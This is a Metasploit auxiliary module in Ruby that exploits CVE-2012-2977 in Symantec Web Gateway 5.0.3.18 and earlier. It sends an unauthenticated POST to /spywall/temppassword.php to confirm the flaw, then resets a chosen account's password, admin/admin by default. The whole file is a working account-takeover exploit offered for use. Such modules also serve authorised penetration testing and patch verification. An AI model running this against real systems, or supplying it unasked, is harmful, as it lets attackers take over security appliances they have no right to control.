##
# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
			'Description'    => %q{
					This module will change the password for the specified account on a Symantec Web Gatewaye server.
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision: 0 $",
			'Author'         =>
				[
					'Kc57',
				],
			'References'     =>
				[
					[ 'CVE', '2012-2977' ],
					[ 'OSVDB', '0' ],
					[ 'BID', '54430' ],
					[ 'URL', 'http://www.securityfocus.com/bid/54430' ],
				],
			'DisclosureDate' => "Jul 23 2012" ))

			register_options(
				[
					Opt::RPORT(80),
					OptString.new('USER', [ true, 'The password to reset to', 'admin']),
					OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
				], self.class)
	end

	def run

		print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
		res = send_request_raw(
		{
			'method'  => 'POST',
			'uri'     => '/spywall/temppassword.php',
		}, 25)

		#check to see if we get HTTP OK
		if (res.code == 200)
			print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
		else
			print_error("Did not get HTTP 200, URL was not found. Exiting!")
			return
		end

		#Check to if the temppassword.php page loads or if we are redirected to the login page
		if (res.body.match(/Please Select a New Password/i))
			print_status("Server is vulnerable!")
		else
			print_error("Target doesn't seem to be vulnerable!")
			return
		end

		print_status("Attempting to exploit password change vulnerability on #{rhost}")
		print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")

		data  = 'target=executive_summary.php'
		data << '&USERNAME=' + datastore['USER']
		data << '&password=' + datastore['PASSWORD']
		data << '&password2=' + datastore['PASSWORD']
		data << '&Save=Save'

		res = send_request_cgi(
		{
			'method'  => 'POST',
			'uri'     => '/spywall/temppassword.php',
			'data'    => data,
		}, 25)

		if res.code == 200
			if (res.body.match(/Thank you/i))
				print_status("Password reset was successful!\n")
			else
				print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
			end
		else
			print_error("Password reset failed!")
		end
	end

end
